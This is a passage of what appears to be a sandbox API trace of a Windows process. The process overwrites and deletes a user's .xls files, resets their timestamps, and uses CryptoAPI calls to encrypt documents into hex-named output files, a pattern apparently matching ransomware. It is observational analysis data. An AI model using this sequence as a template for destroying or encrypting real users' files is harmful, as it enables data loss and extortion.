lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.271] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.271] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.272] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.273] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.274] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.274] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.275] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.276] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.277] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.277] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.278] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.279] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.280] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.280] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.281] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.282] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.282] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.283] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.284] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.285] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.286] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.286] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x800, lpOverlapped=0x0) returned 1 [0076.286] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.287] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.288] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.288] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.289] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.290] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.291] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.291] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.293] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.293] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.294] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.294] SetEndOfFile (hFile=0x36c) returned 1 [0076.295] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.295] CloseHandle (hObject=0x36c) returned 1 [0076.296] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", lpFilePart=0x0) returned 0x43 [0076.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.296] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\gf kqmndstrhyh.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.296] GetFileType (hFile=0x36c) returned 0x1 [0076.296] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.296] GetFileType (hFile=0x36c) returned 0x1 [0076.296] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d278, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.296] CloseHandle (hObject=0x36c) returned 1 [0076.296] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", lpFilePart=0x0) returned 0x43 [0076.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.296] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\gf kqmndstrhyh.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.296] GetFileType (hFile=0x36c) returned 0x1 [0076.296] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.296] GetFileType (hFile=0x36c) returned 0x1 [0076.296] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d278, lpLastWriteTime=0x0) returned 1 [0076.296] CloseHandle (hObject=0x36c) returned 1 [0076.297] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", lpFilePart=0x0) returned 0x43 [0076.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.297] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\gf kqmndstrhyh.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.297] GetFileType (hFile=0x36c) returned 0x1 [0076.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.297] GetFileType (hFile=0x36c) returned 0x1 [0076.297] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d278) returned 1 [0076.297] CloseHandle (hObject=0x36c) returned 1 [0076.297] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", lpFilePart=0x0) returned 0x43 [0076.297] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\gf kqmndstrhyh.xls")) returned 1 [0076.302] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", lpFilePart=0x0) returned 0x43 [0076.302] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DB1A6DCB0F41D68D7D026B82F20A081F", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DB1A6DCB0F41D68D7D026B82F20A081F", lpFilePart=0x0) returned 0x51 [0076.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.302] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DB1A6DCB0F41D68D7D026B82F20A081F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\db1a6dcb0f41d68d7d026b82f20a081f"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.302] GetFileType (hFile=0x36c) returned 0x1 [0076.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.302] GetFileType (hFile=0x36c) returned 0x1 [0076.302] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d318, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.302] CloseHandle (hObject=0x36c) returned 1 [0076.303] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DB1A6DCB0F41D68D7D026B82F20A081F", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DB1A6DCB0F41D68D7D026B82F20A081F", lpFilePart=0x0) returned 0x51 [0076.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.303] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DB1A6DCB0F41D68D7D026B82F20A081F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\db1a6dcb0f41d68d7d026b82f20a081f"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.303] GetFileType (hFile=0x36c) returned 0x1 [0076.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.303] GetFileType (hFile=0x36c) returned 0x1 [0076.303] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d318, lpLastWriteTime=0x0) returned 1 [0076.303] CloseHandle (hObject=0x36c) returned 1 [0076.303] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DB1A6DCB0F41D68D7D026B82F20A081F", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DB1A6DCB0F41D68D7D026B82F20A081F", lpFilePart=0x0) returned 0x51 [0076.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.303] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DB1A6DCB0F41D68D7D026B82F20A081F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\db1a6dcb0f41d68d7d026b82f20a081f"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.303] GetFileType (hFile=0x36c) returned 0x1 [0076.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.303] GetFileType (hFile=0x36c) returned 0x1 [0076.303] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d318) returned 1 [0076.303] CloseHandle (hObject=0x36c) returned 1 [0076.304] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", lpFilePart=0x0) returned 0x47 [0076.304] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", lpFilePart=0x0) returned 0x47 [0076.305] CryptImportKey (in: hProv=0x1a5b7c10, pbData=0x22bb0b8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d120 | out: phKey=0x1bf5d120*=0x1a626e50) returned 1 [0076.305] CryptContextAddRef (hProv=0x1a5b7c10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.305] CryptExportKey (in: hKey=0x1a626e50, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5d230 | out: pbData=0x0*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.305] CryptExportKey (in: hKey=0x1a626e50, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x22bb1a8, pdwDataLen=0x1bf5d230 | out: pbData=0x22bb1a8*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.305] CryptImportKey (in: hProv=0x1a5b7c10, pbData=0x22bb2c8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d0f0 | out: phKey=0x1bf5d0f0*=0x1a626de0) returned 1 [0076.305] CryptContextAddRef (hProv=0x1a5b7c10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.305] CryptContextAddRef (hProv=0x1a5b7c10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.305] CryptDuplicateKey (in: hKey=0x1a626de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d0e0 | out: phKey=0x1bf5d0e0*=0x1a626b40) returned 1 [0076.305] CryptContextAddRef (hProv=0x1a5b7c10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.305] CryptSetKeyParam (hKey=0x1a626b40, dwParam=0x4, pbData=0x22bb410*=0x1, dwFlags=0x0) returned 1 [0076.305] CryptSetKeyParam (hKey=0x1a626b40, dwParam=0x1, pbData=0x22bb3c0, dwFlags=0x0) returned 1 [0076.305] CryptDestroyKey (hKey=0x1a626de0) returned 1 [0076.305] CryptReleaseContext (hProv=0x1a5b7c10, dwFlags=0x0) returned 1 [0076.305] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", lpFilePart=0x0) returned 0x47 [0076.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.305] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\hdmocwsigjodnxc3ha.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.306] GetFileType (hFile=0x36c) returned 0x1 [0076.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.306] GetFileType (hFile=0x36c) returned 0x1 [0076.306] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C8F4B2F2FC35BD887512154166CBF00", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C8F4B2F2FC35BD887512154166CBF00", lpFilePart=0x0) returned 0x51 [0076.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C8F4B2F2FC35BD887512154166CBF00" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\4c8f4b2f2fc35bd887512154166cbf00"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a4 [0076.306] GetFileType (hFile=0x3a4) returned 0x1 [0076.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.306] GetFileType (hFile=0x3a4) returned 0x1 [0076.306] ReadFile (in: hFile=0x36c, lpBuffer=0x22bb800, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x22bb800*, lpNumberOfBytesRead=0x1bf5d128*=0x98b, lpOverlapped=0x0) returned 1 [0076.307] CryptEncrypt (in: hKey=0x1a626b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22cf818*, pdwDataLen=0x1bf5d180*=0x980, dwBufLen=0x980 | out: pbData=0x22cf818*, pdwDataLen=0x1bf5d180*=0x980) returned 1 [0076.307] ReadFile (in: hFile=0x36c, lpBuffer=0x22bb800, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x22bb800*, lpNumberOfBytesRead=0x1bf5d128*=0x0, lpOverlapped=0x0) returned 1 [0076.307] CryptEncrypt (in: hKey=0x1a626b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22d11f0*, pdwDataLen=0x1bf5d0c0*=0x10, dwBufLen=0x10 | out: pbData=0x22d11f0*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.307] CryptEncrypt (in: hKey=0x1a626b40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x22d1240*, pdwDataLen=0x1bf5d0c0*=0x0, dwBufLen=0x10 | out: pbData=0x22d1240*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.307] WriteFile (in: hFile=0x3a4, lpBuffer=0x22d01d8*, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x1bf5d048, lpOverlapped=0x0 | out: lpBuffer=0x22d01d8*, lpNumberOfBytesWritten=0x1bf5d048*=0x990, lpOverlapped=0x0) returned 1 [0076.308] CloseHandle (hObject=0x3a4) returned 1 [0076.310] CloseHandle (hObject=0x36c) returned 1 [0076.310] CryptDestroyKey (hKey=0x1a626e50) returned 1 [0076.310] CryptReleaseContext (hProv=0x1a5b7c10, dwFlags=0x0) returned 1 [0076.310] CryptReleaseContext (hProv=0x1a5b7c10, dwFlags=0x0) returned 1 [0076.310] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C8F4B2F2FC35BD887512154166CBF00", nBufferLength=0x105, lpBuffer=0x1bf5cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C8F4B2F2FC35BD887512154166CBF00", lpFilePart=0x0) returned 0x51 [0076.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d060) returned 1 [0076.310] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C8F4B2F2FC35BD887512154166CBF00" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\4c8f4b2f2fc35bd887512154166cbf00"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.310] GetFileType (hFile=0x36c) returned 0x1 [0076.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfd0) returned 1 [0076.310] GetFileType (hFile=0x36c) returned 0x1 [0076.310] ReadFile (in: hFile=0x36c, lpBuffer=0x22d1980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22d1980*, lpNumberOfBytesRead=0x1bf5d148*=0x990, lpOverlapped=0x0) returned 1 [0076.311] ReadFile (in: hFile=0x36c, lpBuffer=0x22d1980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22d1980*, lpNumberOfBytesRead=0x1bf5d148*=0x0, lpOverlapped=0x0) returned 1 [0076.311] CloseHandle (hObject=0x36c) returned 1 [0076.312] GetFullPathNameW (in: 